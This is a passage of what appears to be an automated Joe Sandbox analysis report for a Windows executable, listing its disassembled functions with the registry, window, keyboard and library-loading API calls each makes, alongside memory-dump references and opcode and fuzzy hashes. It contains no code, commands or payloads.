                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                        • String ID:
                                                                        • API String ID: 4082120231-0
                                                                        • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                        • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                        • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                        • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                        Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                        • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                        • String ID:
                                                                        • API String ID: 2027346449-0
                                                                        • Opcode ID: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                                        • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                        • Opcode Fuzzy Hash: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                                        • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                        Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                        • GetMenu.USER32 ref: 0047A703
                                                                        • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                        • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                        • _wcslen.LIBCMT ref: 0047A79E
                                                                        • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                        • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3257027151-0
                                                                        • Opcode ID: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                                        • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                        • Opcode Fuzzy Hash: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                                        • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                        Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastselect
                                                                        • String ID:
                                                                        • API String ID: 215497628-0
                                                                        • Opcode ID: 0902b8d125b16e906fbee135168885a915a185ebb0dc395c6f8acc5970aa3ebc
                                                                        • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                        • Opcode Fuzzy Hash: 0902b8d125b16e906fbee135168885a915a185ebb0dc395c6f8acc5970aa3ebc
                                                                        • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                        Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 0044443B
                                                                        • GetKeyboardState.USER32(?), ref: 00444450
                                                                        • SetKeyboardState.USER32(?), ref: 004444A4
                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                        • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                        • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                        • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                        Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 00444633
                                                                        • GetKeyboardState.USER32(?), ref: 00444648
                                                                        • SetKeyboardState.USER32(?), ref: 0044469C
                                                                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                        • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                        • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                        • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                        Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                        • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                        • String ID:
                                                                        • API String ID: 2354583917-0
                                                                        • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                        • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                        • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                        • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                        Function 00464812 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                        • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                        • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                        • String ID: Wu
                                                                        • API String ID: 2449869053-4083010176
                                                                        • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                        • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                        • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                        • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                        Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                        • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                        • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                        • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                        Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Enable$Show$MessageMoveSend
                                                                        • String ID:
                                                                        • API String ID: 896007046-0
                                                                        • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                        • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                        • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                        • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                        Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                        • GetFocus.USER32 ref: 00448ACF
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Enable$Show$FocusMessageSend
                                                                        • String ID:
                                                                        • API String ID: 3429747543-0
                                                                        • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                        • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                        • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                        • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                        Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                        • __swprintf.LIBCMT ref: 0045D4E9
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                        • String ID: %lu$\VH
                                                                        • API String ID: 3164766367-2432546070
                                                                        • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                        • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                        • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                        • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                        Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 3850602802-3636473452
                                                                        • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                        • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                        • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                        • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                        Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                        • String ID:
                                                                        • API String ID: 3985565216-0
                                                                        • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                        • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
